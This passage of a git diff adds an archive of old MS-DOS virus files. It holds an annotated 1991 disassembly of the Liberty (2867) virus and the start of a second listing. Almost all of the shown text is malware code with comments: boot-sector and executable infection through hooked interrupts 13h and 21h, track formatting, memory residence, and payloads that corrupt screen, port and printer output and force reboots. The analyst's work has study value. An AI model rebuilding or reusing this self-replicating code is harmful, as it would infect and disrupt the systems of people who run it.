vector 13h +CS:070C 07 POP ES +CS:070D 1F POP DS +CS:070E 5A POP DX +CS:070F 59 POP CX +CS:0710 5B POP BX +CS:0711 58 POP AX +CS:0712 9D POPF +CS:0713 EA00000000 JMP 0000:0000 +CS:0718 50 PUSH AX +CS:0719 53 PUSH BX +CS:071A 51 PUSH CX +CS:071B 52 PUSH DX +CS:071C 1E PUSH DS +CS:071D 06 PUSH ES +CS:071E B80102 MOV AX,0201 ; +CS:0721 0E PUSH CS ; +CS:0722 07 POP ES ; +CS:0723 0E PUSH CS ; +CS:0724 1F POP DS ; +CS:0725 BB420C MOV BX,0C42 ; +CS:0728 B90100 MOV CX,0001 ; +CS:072B 32F6 XOR DH,DH ; +CS:072D 9C PUSHF ; +CS:072E 2E CS: ; +CS:072F FF1E1407 CALL FAR [0714] ; Read Bootsector +CS:0733 72D4 JB 0709 +CS:0735 0E PUSH CS +CS:0736 1F POP DS +CS:0737 0E PUSH CS +CS:0738 07 POP ES +CS:0739 BE420C MOV SI,0C42 ; +CS:073C BF3506 MOV DI,0635 ; +CS:073F B90A00 MOV CX,000A ; +CS:0742 FC CLD ; +CS:0743 F3 REPZ ; +CS:0744 A7 CMPSW ; Check infection +CS:0745 74C2 JZ 0709 +CS:0747 BE420C MOV SI,0C42 +CS:074A 807C02FF CMP BYTE PTR [SI+02],FF ; Was infected ? +CS:074E 744A JZ 079A +CS:0750 B0FF MOV AL,FF +CS:0752 884402 MOV [SI+02],AL +CS:0755 B80905 MOV AX,0509 ; +CS:0758 BBA607 MOV BX,07A6 ; +CS:075B B93128 MOV CX,2831 ; +CS:075E 9C PUSHF ; +CS:075F 2E CS: ; +CS:0760 FF1E1407 CALL FAR [0714] ; Format track 40 +CS:0764 72A3 JB 0709 +CS:0766 B80103 MOV AX,0301 ; +CS:0769 BB420C MOV BX,0C42 ; +CS:076C B93F28 MOV CX,283F ; +CS:076F 9C PUSHF ; +CS:0770 2E CS: ; +CS:0771 FF1E1407 CALL FAR [0714] ; Write original bootsector +CS:0775 7292 JB 0709 +CS:0777 B80103 MOV AX,0301 ; +CS:077A BB3506 MOV BX,0635 ; +CS:077D B90100 MOV CX,0001 ; +CS:0780 9C PUSHF ; +CS:0781 2E CS: ; +CS:0782 FF1E1407 CALL FAR [0714] ; Write Libery bootsector +CS:0786 7281 JB 0709 +CS:0788 B80803 MOV AX,0308 ; +CS:078B BB1001 MOV BX,0110 ; +CS:078E B93128 MOV CX,2831 ; +CS:0791 9C PUSHF ; +CS:0792 2E CS: ; +CS:0793 FF1E1407 CALL FAR [0714] ; Write Liberty virus +CS:0797 E96FFF JMP 0709 +CS:079A 2E CS: ; +CS:079B C606100300 MOV BYTE PTR [0310],00 ; +CS:07A0 E83B00 CALL 07DE ; Attach ??? +CS:07A3 E963FF JMP 0709 +; +; The format table is next +; +DS:07A0 28 00-31 02 28 00 32 02 28 00 +DS:07B0 33 02 28 00 34 02 28 00-35 02 28 00 36 02 28 00 +DS:07C0 37 02 28 00 38 02 28 00-3F 02 +; +; Revectoring +; +CS:07CA 33C0 XOR AX,AX +CS:07CC 8ED8 MOV DS,AX +CS:07CE FA CLI +CS:07CF 2E CS: +CS:07D0 A11407 MOV AX,[0714] +CS:07D3 A34C00 MOV [004C],AX +CS:07D6 2E CS: +CS:07D7 A11607 MOV AX,[0716] +CS:07DA A34E00 MOV [004E],AX +CS:07DD C3 RET +CS:07DE 2E CS: +CS:07DF A11407 MOV AX,[0714] +CS:07E2 2E CS: +CS:07E3 A30C03 MOV [030C],AX +CS:07E6 2E CS: +CS:07E7 A11607 MOV AX,[0716] +CS:07EA 2E CS: +CS:07EB A30E03 MOV [030E],AX +CS:07EE B8F702 MOV AX,02F7 +CS:07F1 2E CS: +CS:07F2 A31407 MOV [0714],AX +CS:07F5 2E CS: +CS:07F6 8C0E1607 MOV [0716],CS +CS:07FA C3 RET +; +; Boot sectors are infected via vector 13h +; +CS:07FB 9C PUSHF +CS:07FC 80FC03 CMP AH,03 +CS:07FF 7213 JB 0814 +CS:0801 80FC05 CMP AH,05 +CS:0804 730E JNB 0814 +CS:0806 80FA80 CMP DL,80 +CS:0809 720F JB 081A +CS:080B EB07 JMP 0814 +CS:080D 90 NOP +CS:080E 07 POP ES +CS:080F 1F POP DS +CS:0810 5A POP DX +CS:0811 59 POP CX +CS:0812 5B POP BX +CS:0813 58 POP AX +CS:0814 9D POPF +CS:0815 EA00000000 JMP 0000:0000 +CS:081A 50 PUSH AX +CS:081B 53 PUSH BX +CS:081C 51 PUSH CX +CS:081D 52 PUSH DX +CS:081E 1E PUSH DS +CS:081F 06 PUSH ES +CS:0820 2E CS: +CS:0821 803E0C0401 CMP BYTE PTR [040C],01 +CS:0826 74E6 JZ 080E +CS:0828 B80102 MOV AX,0201 ; +CS:082B 0E PUSH CS ; +CS:082C 07 POP ES ; +CS:082D 0E PUSH CS ; +CS:082E 1F POP DS ; +CS:082F BB420C MOV BX,0C42 ; +CS:0832 B90100 MOV CX,0001 ; +CS:0835 32F6 XOR DH,DH ; +CS:0837 9C PUSHF ; +CS:0838 2E CS: ; +CS:0839 FF1E1608 CALL FAR [0816] ; Read bootsector +CS:083D 72CF JB 080E +CS:083F 0E PUSH CS +CS:0840 1F POP DS +CS:0841 0E PUSH CS +CS:0842 07 POP ES +CS:0843 BE420C MOV SI,0C42 ; +CS:0846 BF3506 MOV DI,0635 ; +CS:0849 B90A00 MOV CX,000A ; +CS:084C FC CLD ; +CS:084D F3 REPZ ; +CS:084E A7 CMPSW ; Check infection +CS:084F 74BD JZ 080E +CS:0851 B0FF MOV AL,FF +CS:0853 884702 MOV [BX+02],AL +CS:0856 B80905 MOV AX,0509 ; +CS:0859 BBA607 MOV BX,07A6 ; +CS:085C B93128 MOV CX,2831 ; +CS:085F 9C PUSHF ; +CS:0860 2E CS: ; +CS:0861 FF1E1608 CALL FAR [0816] ; Format track 28 +CS:0865 72A7 JB 080E +CS:0867 B80103 MOV AX,0301 ; +CS:086A BB420C MOV BX,0C42 ; +CS:086D B93F28 MOV CX,283F ; +CS:0870 9C PUSHF ; +CS:0871 2E CS: ; +CS:0872 FF1E1608 CALL FAR [0816] ; Write original bootsector +CS:0876 7296 JB 080E +CS:0878 B80103 MOV AX,0301 ; +CS:087B BB3506 MOV BX,0635 ; +CS:087E B90100 MOV CX,0001 ; +CS:0881 9C PUSHF ; +CS:0882 2E CS: ; +CS:0883 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0887 7285 JB 080E +CS:0889 B80803 MOV AX,0308 ; +CS:088C BB1001 MOV BX,0110 ; +CS:088F B93128 MOV CX,2831 ; +CS:0892 9C PUSHF ; +CS:0893 2E CS: ; +CS:0894 FF1E1608 CALL FAR [0816] ; Write Liberty bootsector +CS:0898 E973FF JMP 080E +CS:089B 9C PUSHF +CS:089C 50 PUSH AX +CS:089D 1E PUSH DS +CS:089E 33C0 XOR AX,AX +CS:08A0 8ED8 MOV DS,AX +CS:08A2 833E860000 CMP WORD PTR [0086],+00 ; +CS:08A7 750F JNZ 08B8 ; Check if DOS is installed +CS:08A9 833E840000 CMP WORD PTR [0084],+00 ; +CS:08AE 7508 JNZ 08B8 +CS:08B0 1F POP DS +CS:08B1 58 POP AX +CS:08B2 9D POPF +CS:08B3 EA00000000 JMP 0000:0000 +CS:08B8 06 PUSH ES +CS:08B9 0E PUSH CS +CS:08BA 07 POP ES +CS:08BB E8C3F9 CALL 0281 ; Get vector 21h +CS:08BE E8F1F9 CALL 02B2 ; Set vector 21h +CS:08C1 E82000 CALL 08E4 ; Disconnect vector 8h +CS:08C4 E8FBF9 CALL 02C2 ; Set installation flag +CS:08C7 07 POP ES +CS:08C8 EBE6 JMP 08B0 +; +; Revectoring +; +CS:08CA A12000 MOV AX,[0020] +CS:08CD 2E CS: +CS:08CE A3B408 MOV [08B4],AX +CS:08D1 A12200 MOV AX,[0022] +CS:08D4 2E CS: +CS:08D5 A3B608 MOV [08B6],AX +CS:08D8 B89B08 MOV AX,089B +CS:08DB FA CLI +CS:08DC A32000 MOV [0020],AX +CS:08DF 8C0E2200 MOV [0022],CS +CS:08E3 C3 RET +CS:08E4 33C0 XOR AX,AX +CS:08E6 8ED8 MOV DS,AX +CS:08E8 FA CLI +CS:08E9 2E CS: +CS:08EA A1B408 MOV AX,[08B4] +CS:08ED A32000 MOV [0020],AX +CS:08F0 2E CS: +CS:08F1 A1B608 MOV AX,[08B6] +CS:08F4 A32200 MOV [0022],AX +CS:08F7 C3 RET +CS:08F8 A17000 MOV AX,[0070] +CS:08FB 2E CS: +CS:08FC A3900A MOV [0A90],AX +CS:08FF A17200 MOV AX,[0072] +CS:0902 2E CS: +CS:0903 A3920A MOV [0A92],AX +CS:0906 B8580A MOV AX,0A58 +CS:0909 FA CLI +CS:090A A37000 MOV [0070],AX +CS:090D 8C0E7200 MOV [0072],CS +CS:0911 C3 RET +; +; The next routine displays 'M A G I C ! !' on the screen for a second +; +CS:0912 50 PUSH AX +CS:0913 53 PUSH BX +CS:0914 51 PUSH CX +CS:0915 52 PUSH DX +CS:0916 56 PUSH SI +CS:0917 57 PUSH DI +CS:0918 1E PUSH DS +CS:0919 06 PUSH ES +CS:091A 9C PUSHF +CS:091B BB00B8 MOV BX,B800 ; +CS:091E 8EDB MOV DS,BX ; +CS:0920 0E PUSH CS ; +CS:0921 07 POP ES ; +CS:0922 33F6 XOR SI,SI ; +CS:0924 BF6809 MOV DI,0968 ; +CS:0927 B9A000 MOV CX,00A0 ; +CS:092A F3 REPZ ; +CS:092B A4 MOVSB ; Save screen +CS:092C BB00B8 MOV BX,B800 ; +CS:092F 8EC3 MOV ES,BX ; +CS:0931 0E PUSH CS ; +CS:0932 1F POP DS ; +CS:0933 33FF XOR DI,DI ; +CS:0935 BB080A MOV BX,0A08 ; +CS:0938 B95000 MOV CX,0050 ; +CS:093B B6CE MOV DH,CE ; +CS:093D 8A17 MOV DL,[BX] ; +CS:093F 80EA03 SUB DL,03 ; +CS:0942 26 ES: ; +CS:0943 8915 MOV [DI],DX ; +CS:0945 47 INC DI ; +CS:0946 47 INC DI ; +CS:0947 43 INC BX ; +CS:0948 E2F3 LOOP 093D ; Put text on screen +CS:094A E2FE LOOP 094A ; Wait +CS:094C BB00B8 MOV BX,B800 ; +CS:094F 8EC3 MOV ES,BX ; +CS:0951 0E PUSH CS ; +CS:0952 1F POP DS ; +CS:0953 33FF XOR DI,DI ; +CS:0955 BE6809 MOV SI,0968 ; +CS:0958 B9A000 MOV CX,00A0 ; +CS:095B F3 REPZ ; +CS:095C A4 MOVSB ; Restore screen +CS:095D 9D POPF +CS:095E 07 POP ES +CS:095F 1F POP DS +CS:0960 5F POP DI +CS:0961 5E POP SI +CS:0962 5A POP DX +CS:0963 59 POP CX +CS:0964 5B POP BX +CS:0965 58 POP AX +CS:0966 C3 RET +; +; A temporary screen buffer +; +DS:0960 4D 41 47 49 43 4D 41 47 +DS:0970 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:0980 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:0990 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09A0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:09B0 47 49 43 4D 41 47 49 43-4D 41 47 49 43 4D 41 47 +DS:09C0 49 43 4D 41 47 49 43 4D-41 47 49 43 4D 41 47 49 +DS:09D0 43 4D 41 47 49 43 4D 41-47 49 43 4D 41 47 49 43 +DS:09E0 4D 41 47 49 43 4D 41 47-49 43 4D 41 47 49 43 4D +DS:09F0 41 47 49 43 4D 41 47 49-43 4D 41 47 49 43 4D 41 +DS:0A00 47 49 43 4D 41 47 49 43 +; +; The encrypted text 'M A G I C ! !' +; +DS:0A00 23 23 23 23 23 23 23 23 +DS:0A10 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A20 23 23 23 23 23 23 23 23-23 23 23 23 23 23 23 23 +DS:0A30 23 23 23 23 23 23 23 23-23 23 50 23 44 23 4A 23 +DS:0A40 4C 23 46 23 23 24 23 24-23 24 23 23 23 23 23 23 +DS:0A50 23 23 23 23 23 23 23 23 +; +; The next routine is the timer routine. It activates all the gadgets. +; +CS:0A58 9C PUSHF +CS:0A59 50 PUSH AX +CS:0A5A 1E PUSH DS +CS:0A5B 2E CS: +CS:0A5C FF06940A INC WORD PTR [0A94] +CS:0A60 2E CS: +CS:0A61 833E960A0B CMP WORD PTR [0A96],+0B ; Time for a reboot ? +CS:0A66 7433 JZ 0A9B +CS:0A68 2E CS: +CS:0A69 A1980A MOV AX,[0A98] +CS:0A6C 2E CS: +CS:0A6D 3906940A CMP [0A94],AX ; Time for gadgets on ? +CS:0A71 7430 JZ 0AA3 +CS:0A73 7217 JB 0A8C +CS:0A75 050002 ADD AX,0200 +CS:0A78 2E CS: +CS:0A79 3906940A CMP [0A94],AX ; Time for gadgets off ? +CS:0A7D 7446 JZ 0AC5 +CS:0A7F 770B JA 0A8C +CS:0A81 2E CS: +CS:0A82 833E960A0A CMP WORD PTR [0A96],+0A ; Time for screen messing ? +CS:0A87 7503 JNZ 0A8C +CS:0A89 E886FE CALL 0912 ; Mess up screen +CS:0A8C 1F POP DS +CS:0A8D 58 POP AX +CS:0A8E 9D POPF +CS:0A8F EA00000000 JMP 0000:0000 ; Continue +CS:0A9B B8FFFF MOV AX,FFFF +CS:0A9E 50 PUSH AX +CS:0A9F 33C0 XOR AX,AX +CS:0AA1 50 PUSH AX +CS:0AA2 CB RETF +CS:0AA3 2E CS: +CS:0AA4 812E980A5001 SUB WORD PTR [0A98],0150 +CS:0AAA 33C0 XOR AX,AX +CS:0AAC 8ED8 MOV DS,AX +CS:0AAE 2E CS: +CS:0AAF C606470B00 MOV BYTE PTR [0B47],00 +CS:0AB4 90 NOP +CS:0AB5 2E CS: +CS:0AB6 C606950B00 MOV BYTE PTR [0B95],00 +CS:0ABB 90 NOP +CS:0ABC 2E CS: +CS:0ABD C606080C00 MOV BYTE PTR [0C08],00 +CS:0AC2 90 NOP +CS:0AC3 EBC7 JMP 0A8C +CS:0AC5 2E CS: +CS:0AC6 C606470BFF MOV BYTE PTR [0B47],FF +CS:0ACB 90 NOP +CS:0ACC 2E CS: +CS:0ACD C606950BFF MOV BYTE PTR [0B95],FF +CS:0AD2 90 NOP +CS:0AD3 2E CS: +CS:0AD4 C606080CFF MOV BYTE PTR [0C08],FF +CS:0AD9 90 NOP +CS:0ADA 2E CS: +CS:0ADB C706940A0000 MOV WORD PTR [0A94],0000 +CS:0AE1 2E CS: +CS:0AE2 FF06960A INC WORD PTR [0A96] +CS:0AE6 EBA4 JMP 0A8C +CS:0AE8 A14000 MOV AX,[0040] +CS:0AEB 2E CS: +CS:0AEC A3430B MOV [0B43],AX +CS:0AEF A14200 MOV AX,[0042] +CS:0AF2 2E CS: +CS:0AF3 A3450B MOV [0B45],AX +CS:0AF6 B8360B MOV AX,0B36 +CS:0AF9 FA CLI +CS:0AFA A34000 MOV [0040],AX +CS:0AFD 8C0E4200 MOV [0042],CS +CS:0B01 C3 RET +CS:0B02 FA CLI +CS:0B03 A15000 MOV AX,[0050] +CS:0B06 2E CS: +CS:0B07 A3910B MOV [0B91],AX +CS:0B0A A15200 MOV AX,[0052] +CS:0B0D 2E CS: +CS:0B0E A3930B MOV [0B93],AX +CS:0B11 B8840B MOV AX,0B84 +CS:0B14 A35000 MOV [0050],AX +CS:0B17 8C0E5200 MOV [0052],CS +CS:0B1B C3 RET +CS:0B1C FA CLI +CS:0B1D A15C00 MOV AX,[005C] +CS:0B20 2E CS: +CS:0B21 A3040C MOV [0C04],AX +CS:0B24 A15E00 MOV AX,[005E] +CS:0B27 2E CS: +CS:0B28 A3060C MOV [0C06],AX +CS:0B2B B8FC0B MOV AX,0BFC +CS:0B2E A35C00 MOV [005C],AX +CS:0B31 8C0E5E00 MOV [005E],CS +CS:0B35 C3 RET +; +; Now the gadgets' routines. When activated, only the word MAGIC!! will be +; sent to screen, port, and printer. +; +CS:0B36 9C PUSHF ; Screen +CS:0B37 80FC09 CMP AH,09 +CS:0B3A 740F JZ 0B4B +CS:0B3C 80FC0A CMP AH,0A +CS:0B3F 740A JZ 0B4B +CS:0B41 9D POPF +CS:0B42 EA00000000 JMP 0000:0000 +CS:0B4B 2E CS: +CS:0B4C 803E470BFF CMP BYTE PTR [0B47],FF +CS:0B51 74EE JZ 0B41 +CS:0B53 53 PUSH BX +CS:0B54 56 PUSH SI +CS:0B55 50 PUSH AX +CS:0B56 33DB XOR BX,BX +CS:0B58 2E CS: +CS:0B59 833E480B07 CMP WORD PTR [0B48],+07 +CS:0B5E 7507 JNZ 0B67 +CS:0B60 2E CS: +CS:0B61 C706480B0000 MOV WORD PTR [0B48],0000 +CS:0B67 2E CS: +CS:0B68 8B1E480B MOV BX,[0B48] +CS:0B6C 2E CS: +CS:0B6D 8B3E480B MOV DI,[0B48] +CS:0B71 47 INC DI +CS:0B72 2E CS: +CS:0B73 893E480B MOV [0B48],DI +CS:0B77 BE3B0C MOV SI,0C3B +CS:0B7A 58 POP AX +CS:0B7B 2E CS: +CS:0B7C 8A00 MOV AL,[BX+SI] +CS:0B7E FEC0 INC AL +CS:0B80 5E POP SI +CS:0B81 5B POP BX +CS:0B82 EBBD JMP 0B41 +CS:0B84 9C PUSHF ; Port +CS:0B85 80FC01 CMP AH,01 +CS:0B88 740D JZ 0B97 +CS:0B8A 80FC02 CMP AH,02 +CS:0B8D 7436 JZ 0BC5 +CS:0B8F 9D POPF +CS:0B90 EA00000000 JMP 0000:0000 +CS:0B97 2E CS: +CS:0B98 803E950BFF CMP BYTE PTR [0B95],FF +CS:0B9D 74F0 JZ 0B8F +CS:0B9F 53 PUSH BX +CS:0BA0 56 PUSH SI +CS:0BA1 33DB XOR BX,BX +CS:0BA3 2E CS: +CS:0BA4 8A1E960B MOV BL,[0B96] +CS:0BA8 BE3B0C MOV SI,0C3B +CS:0BAB 2E CS: +CS:0BAC 8A00 MOV AL,[BX+SI] +CS:0BAE 2E CS: +CS:0BAF FE06960B INC BYTE PTR [0B96] +CS:0BB3 2E CS: +CS:0BB4 803E960B07 CMP BYTE PTR [0B96],07 +CS:0BB9 7506 JNZ 0BC1 +CS:0BBB 2E CS: +CS:0BBC C606960B00 MOV BYTE PTR [0B96],00 +CS:0BC1 5E POP SI +CS:0BC2 5B POP BX +CS:0BC3 EBCA JMP 0B8F +CS:0BC5 2E CS: +CS:0BC6 803E950BFF CMP BYTE PTR [0B95],FF +CS:0BCB 74C2 JZ 0B8F +CS:0BCD 2E CS: +CS:0BCE FF1E910B CALL FAR [0B91] +CS:0BD2 80FC00 CMP AH,00 +CS:0BD5 7F24 JG 0BFB +CS:0BD7 53 PUSH BX +CS:0BD8 56 PUSH SI +CS:0BD9 33DB XOR BX,BX +CS:0BDB 2E CS: +CS:0BDC 8A1E960B MOV BL,[0B96] +CS:0BE0 BE3B0C MOV SI,0C3B +CS:0BE3 2E CS: +CS:0BE4 8A00 MOV AL,[BX+SI] +CS:0BE6 2E CS: +CS:0BE7 FE06960B INC BYTE PTR [0B96] +CS:0BEB 2E CS: +CS:0BEC 803E960B07 CMP BYTE PTR [0B96],07 +CS:0BF1 7506 JNZ 0BF9 +CS:0BF3 2E CS: +CS:0BF4 C606960B00 MOV BYTE PTR [0B96],00 +CS:0BF9 5E POP SI +CS:0BFA 5B POP BX +CS:0BFB CF IRET +CS:0BFC 9C PUSHF ; Printer +CS:0BFD 80FC00 CMP AH,00 +CS:0C00 7407 JZ 0C09 +CS:0C02 9D POPF +CS:0C03 EA00000000 JMP 0000:0000 +CS:0C09 2E CS: +CS:0C0A 803E080CFF CMP BYTE PTR [0C08],FF +CS:0C0F 74F1 JZ 0C02 +CS:0C11 53 PUSH BX +CS:0C12 56 PUSH SI +CS:0C13 33DB XOR BX,BX +CS:0C15 2E CS: +CS:0C16 8A1E3A0C MOV BL,[0C3A] +CS:0C1A BE3B0C MOV SI,0C3B +CS:0C1D 2E CS: +CS:0C1E 8A00 MOV AL,[BX+SI] +CS:0C20 FEC0 INC AL +CS:0C22 2E CS: +CS:0C23 FE063A0C INC BYTE PTR [0C3A] +CS:0C27 2E CS: +CS:0C28 803E3A0C07 CMP BYTE PTR [0C3A],07 +CS:0C2D 7507 JNZ 0C36 +CS:0C2F 2E CS: +CS:0C30 C6063A0C00 MOV BYTE PTR [0C3A],00 +CS:0C35 90 NOP +CS:0C36 5E POP SI +CS:0C37 5B POP BX +CS:0C38 EBC8 JMP 0C02 +; +; The encrypted text 'MAGIC!!' +; +DS:0C3A 4C 40 46 48 42 20 20 +; +; Important note: +; When there is no longer space on the disk to infect a file, the Liberty +; virus will infect the bootsector. This is done in the 'OHIO' way. +; +; +; +; End of Liberty (2867) disassembly. (c) 1991 by Remco van Helvoort. +; This document may be freely shared. If you have any comments or some +; nice little viruses for analysis, feel free to drop me a note. +; +; Remco van Helvoort +; Bredastraat 3 +; 5224 VD 's-Hertogenbosch +; Holland +; + +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + diff --git a/MSDOS/Virus.MSDOS.Unknown.liberty2.lst b/MSDOS/Virus.MSDOS.Unknown.liberty2.lst new file mode 100644 index 00000000..ad39d293 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.liberty2.lst @@ -0,0 +1,1194 @@ +CS:0110 EB79 JMP 018B +CS:0112 90 NOP +; +; The program's original infomation is stored between these sections +; +CS:018B 2E CS: +CS:018C 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ? +CS:0191 7403 JZ 0196 +CS:0193 1F POP DS +CS:0194 59 POP CX +CS:0195 5B POP BX +CS:0196 50 PUSH AX +CS:0197 53 PUSH BX +CS:0198 51 PUSH CX +CS:0199 52 PUSH DX +CS:019A 1E PUSH DS +CS:019B 06 PUSH ES +CS:019C 1E PUSH DS +CS:019D 0E PUSH CS +CS:019E 1F POP DS +CS:019F E8CD00 CALL 026F ; Installation check +CS:01A2 3DFFFF CMP AX,FFFF +CS:01A5 741A JZ 01C1 +CS:01A7 E8D700 CALL 0281 ; Get vector 21h +CS:01AA 07 POP ES +CS:01AB 06 PUSH ES +CS:01AC 8CC0 MOV AX,ES +CS:01AE 48 DEC AX +CS:01AF 8ED8 MOV DS,AX +CS:01B1 E8DC00 CALL 0290 ; Adjust MCB +CS:01B4 8EC0 MOV ES,AX +CS:01B6 0E PUSH CS +CS:01B7 1F POP DS +CS:01B8 E8EC00 CALL 02A7 ; Move to Upper Memory +CS:01BB E8F400 CALL 02B2 ; Set vector 21h +CS:01BE E80101 CALL 02C2 ; Set installation flag +CS:01C1 2E CS: +CS:01C2 803E090201 CMP BYTE PTR [0209],01 ; .EXE file ? +CS:01C7 7417 JZ 01E0 +CS:01C9 07 POP ES +CS:01CA 0E PUSH CS +CS:01CB 1F POP DS +CS:01CC E80901 CALL 02D8 ; Decrypt header +CS:01CF E81901 CALL 02EB ; Restore header +CS:01D2 07 POP ES +CS:01D3 1F POP DS +CS:01D4 5A POP DX +CS:01D5 59 POP CX +CS:01D6 5B POP BX +CS:01D7 58 POP AX +CS:01D8 1E PUSH DS +CS:01D9 BF0001 MOV DI,0100 +CS:01DC 57 PUSH DI +CS:01DD 33FF XOR DI,DI +CS:01DF CB RETF ; Start file +CS:01E0 FA CLI +CS:01E1 5E POP SI +CS:01E2 07 POP ES +CS:01E3 1F POP DS +CS:01E4 5A POP DX +CS:01E5 59 POP CX +CS:01E6 5B POP BX +CS:01E7 58 POP AX +CS:01E8 2E CS: +CS:01E9 8B3E2C06 MOV DI,[062C] +CS:01ED 03FE ADD DI,SI +CS:01EF 8ED7 MOV SS,DI +CS:01F1 2E CS: +CS:01F2 8B3E2E06 MOV DI,[062E] +CS:01F6 8BE7 MOV SP,DI ; Restore stack +CS:01F8 2E CS: +CS:01F9 8B3E2806 MOV DI,[0628] +CS:01FD 03FE ADD DI,SI +CS:01FF 57 PUSH DI +CS:0200 2E CS: +CS:0201 FF362A06 PUSH [062A] +CS:0205 33F6 XOR SI,SI +CS:0207 EBD4 JMP 01DD ; Start file +; +; The encrypted Liberty header for .COM files +; +DS:0200 1D 69 D9 00 01 01 +DS:0210 80 80 40 40 20 20 10 10-08 08 A4 05 D2 04 C9 02 +DS:0220 4C 81 A8 40 49 20 21 90-0B 48 E8 69 95 05 4A 92 +DS:0230 21 1D 40 A8 43 28 90 14-4E 4C 07 27 D3 22 81 81 +DS:0240 C0 B0 40 C4 79 20 90 29-5C D0 AE 69 57 35 2B 9A +DS:0250 31 CD 34 40 51 53 AE 5D-62 C0 E3 C1 B0 35 58 F6 +DS:0260 46 E5 20 02 +; +; Various subroutines used by the virus +; +CS:026F 2E CS: +CS:0270 8A1E6A02 MOV BL,[026A] +CS:0274 32FF XOR BH,BH +CS:0276 33C0 XOR AX,AX +CS:0278 8ED8 MOV DS,AX +CS:027A D1E3 SHL BX,1 +CS:027C D1E3 SHL BX,1 +CS:027E 8B07 MOV AX,[BX] +CS:0280 C3 RET +CS:0281 A18400 MOV AX,[0084] +CS:0284 2E CS: +CS:0285 A38C03 MOV [038C],AX +CS:0288 A18600 MOV AX,[0086] +CS:028B 2E CS: +CS:028C A38E03 MOV [038E],AX +CS:028F C3 RET +CS:0290 BB4221 MOV BX,2142 +CS:0293 B104 MOV CL,04 +CS:0295 D3EB SHR BX,CL +CS:0297 291E0300 SUB [0003],BX +CS:029B A10300 MOV AX,[0003] +CS:029E 03060100 ADD AX,[0001] +CS:02A2 A31200 MOV [0012],AX +CS:02A5 40 INC AX +CS:02A6 C3 RET +CS:02A7 BF1001 MOV DI,0110 +CS:02AA 8BF7 MOV SI,DI +CS:02AC B99A05 MOV CX,059A +CS:02AF F3 REPZ +CS:02B0 A5 MOVSW +CS:02B1 C3 RET +CS:02B2 33C0 XOR AX,AX +CS:02B4 8ED8 MOV DS,AX +CS:02B6 FA CLI +CS:02B7 B86C03 MOV AX,036C +CS:02BA A38400 MOV [0084],AX +CS:02BD 8C068600 MOV [0086],ES +CS:02C1 C3 RET +CS:02C2 FA CLI +CS:02C3 B8FFFF MOV AX,FFFF +CS:02C6 2E CS: +CS:02C7 8A1E6A02 MOV BL,[026A] +CS:02CB 32FF XOR BH,BH +CS:02CD D1E3 SHL BX,1 +CS:02CF D1E3 SHL BX,1 +CS:02D1 8907 MOV [BX],AX +CS:02D3 40 INC AX +CS:02D4 894702 MOV [BX+02],AX +CS:02D7 C3 RET +CS:02D8 B93C00 MOV CX,003C +CS:02DB BE1301 MOV SI,0113 +CS:02DE 2E CS: +CS:02DF 8B14 MOV DX,[SI] +CS:02E1 D3CA ROR DX,CL +CS:02E3 2E CS: +CS:02E4 8914 MOV [SI],DX +CS:02E6 46 INC SI +CS:02E7 46 INC SI +CS:02E8 E2F4 LOOP 02DE +CS:02EA C3 RET +CS:02EB BF0001 MOV DI,0100 +CS:02EE BE1301 MOV SI,0113 +CS:02F1 B93C00 MOV CX,003C +CS:02F4 F3 REPZ +CS:02F5 A5 MOVSW +CS:02F6 C3 RET +; +; I am not sure what the next routine is supposed to be doing. +; +CS:02F7 9C PUSHF +CS:02F8 2E CS: +CS:02F9 803E100301 CMP BYTE PTR [0310],01 +CS:02FE 740A JZ 030A +CS:0300 80FC03 CMP AH,03 +CS:0303 7505 JNZ 030A +CS:0305 80FA80 CMP DL,80 +CS:0308 7207 JB 0311 +CS:030A 9D POPF +CS:030B EA00000000 JMP 0000:0000 +CS:0311 06 PUSH ES +CS:0312 0E PUSH CS +CS:0313 07 POP ES +CS:0314 B80902 MOV AX,0209 +CS:0317 BB420C MOV BX,0C42 +CS:031A B90100 MOV CX,0001 +CS:031D 9C PUSHF +CS:031E 2E CS: +CS:031F FF1E0C03 CALL FAR [030C] +CS:0323 72E5 JB 030A +CS:0325 B80905 MOV AX,0509 +CS:0328 BB4803 MOV BX,0348 +CS:032B B93100 MOV CX,0031 +CS:032E 9C PUSHF +CS:032F 2E CS: +CS:0330 FF1E0C03 CALL FAR [030C] +CS:0334 72D4 JB 030A +CS:0336 B80903 MOV AX,0309 +CS:0339 BB420C MOV BX,0C42 +CS:033C B93100 MOV CX,0031 +CS:033F 9C PUSHF +CS:0340 2E CS: +CS:0341 FF1E0C03 CALL FAR [030C] +CS:0345 07 POP ES +CS:0346 9D POPF +CS:0347 CF IRET +; +; Another format table used by the virus +; +DS:0340 00 00 31 02 00 00 32 02 +DS:0350 00 00 33 02 00 00 34 02-00 00 35 02 00 00 36 02 +DS:0360 00 00 37 02 00 00 38 02-00 00 39 02 +; +; The virus infects files by monitoring function 4Bh of vector 21h +; +CS:036C 9C PUSHF +CS:036D 3D004B CMP AX,4B00 ; Execute function ? +CS:0370 741E JZ 0390 +CS:0372 EB16 JMP 038A +CS:0374 90 NOP 